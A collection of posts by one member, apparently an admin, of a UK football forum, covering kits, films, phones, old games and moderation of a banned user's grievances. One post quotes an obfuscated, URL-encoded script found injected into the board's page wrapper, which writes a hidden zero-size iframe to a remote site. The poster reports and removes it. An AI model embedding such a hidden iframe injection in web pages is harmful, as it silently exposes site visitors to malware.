  1. Damn you fuckers for pandering to her... there's another 3½ years worth to read through - we'll not see her for some time

aye but they inverted meet with the Mig was taking the piss a bit... In all seriousness, I think it's a bit different when you're not expecting to see (or indeed looking for) another plane.
  3. Umbro are claiming that these images are not genuine. Hmmm - what's not genuine, the images or the design itself? Very loose response from Umbro. Hope to fuck it is the design that's not genuine though.

Good job they missed, would most probably have died before they hit the ground.......

http://news.bbc.co.uk/1/hi/uk/7892448.stm I reckon RobW was late for his dinner....
  6. Back again for me with a different link. Fuck's sake - I can't beat this...
  7. Deleted again. Upgrade is not as straight forward as we think. Working on it (i believe).
  8. Beyond Google Maps (which ties in well with the GPS) I haven't really installed anything. However the phone techno at work is a good mate of mine and he's using the same phone. Will find out if he's found anything worth adding
  9. The Boy In The Striped Pyjamas - Great film that really did expose the shame that was felt at the time 8/10 Seven Pounds - Good ending, but my god was the plot slow? I'd worked out what was going on pretty early on and found myself wanting to hurry him up. Spoiled by the jellyfish though - put a massive hole in the plot. 6/10 Slumdog Millionaire - cleverly done - good all round film despite it seeming like The Usual Suspects meets Forrest Gump. 7/10
  10. Hmmmm - i found this imbedded in the board header/footer wrapper..... <script type="text/javascript"> document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%74%72%61%66%6D%2E%63%6E%2F%64%6C%6C%2F%67%6F%2E%70%68%70%3F%73%69%64%3D%31%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E')); </script> I haven't got a scooby and what concerns me more is I've locked down those files for edit so I can't understand how they've been changed. I've deleted this shit so hopefully it'll be behaving once more for you guys. BTW - if anyone has an ideas as to what the fuck that code is all about, I'd be grateful.
  11. Nar it's Everton v Chelsea at Woodison. The Everton player is obviously Graeme Sharp, Colin Pates on the left, and the uncapped jock Doug Rougvie in the middle. What's the 'West Ham United' bit for? Have a guess. What are you on about Tom? It's a programme for Chelsea-West Ham. The picture on the front is Chelsea (in their reddy-orange away kit) against Everton. Am I missing something? Who the hell is John Anderson btw?

I can't understand how people on foot don't know they are coming, yeah if you're deaf and blind you'd be in trouble but otherwise getting hit by a train is like not noticing the bus whose path you've just stepped into. You could see it happening with a bus though I suppose - you know, a busy street and you step out (it could also be obscured etc.). A train though? How do you miss that coming? I don't think it's necessarily a point of them missing the train, I think most of them who are hit (or nearly hit) haven't considered how fast it's actually moving. Stand on a platform in a station an watch a train move through that station without stopping. As it's approaching, it doesn't necessarily appear to be moving that quick but when it passes you, it almost knocks you off your feet.
  13. Yep - I've eradicated the problem, that's why No-one's getting it now.
  14. Absolutely fucking shocking... Far too much red. If they're going to use that much, they should contrast it with a similar about of blue (ala Admiral effort in 1982).
  15. He was never manager in the first place tbh
  16. I have it... and Football 87, and Football 88. All completed Tempted to flog them on ebay like.
  17. My brother has the Blackberry Bold and obviously I have the N71. Whilst I like the 'pearl', I just can't get along with the interface. He's exactly the opposite - loves the navigation of mine but hates the operation. Guess it's a case of each to their own...
  18. Same. And here... I also think it's a subject that needs approaching with care.
  19. I'd forgotten all about him.... He literally was a fucking animal. Became a brickie after football apparently - Michael Elphick's 'McGowan' had nowt on Billy Whitehurst.
  20. Give that man a stick of rock
  21. 15 of your 19 posts are in here... I guess that answers a question then. Bottom line is if you want to join in here then do so, just don't use this place as a platform to air your grievances about another site. Thank you.
  22. Are you going to post in any other thread or are you simply here for one reason and one reason only?
  23. I think it's what's prompted you to log in that has got people's backs up. Also you desire to share with us that you're banned from another site and why. I couldn't care less what has happened on N-O. They have rules in place which differ to here. On both sites you are made aware of the rules BEFORE you first sign in. Posting about it is attention seeking tbh. err, this thread was about bans wasnt it? Aye, from a month ago. but, stll apt, place post about a ban,...or attention seeking,...or perhaps an attempt to find out how long from someone who posts on both forums,....oh jesus fuck there are some you know,... fucking hell both forums,...what kind of people must they be. You can post where the hell you like - here, there or both. Just stop whinging about bans on other sites - there's nowt we can do about it and quite frankly it's pathetic. And yes, there is a (n old) thread about it but there's also one about Gemmill being hung like a chinese mouse. I don't want that one dragging up either!
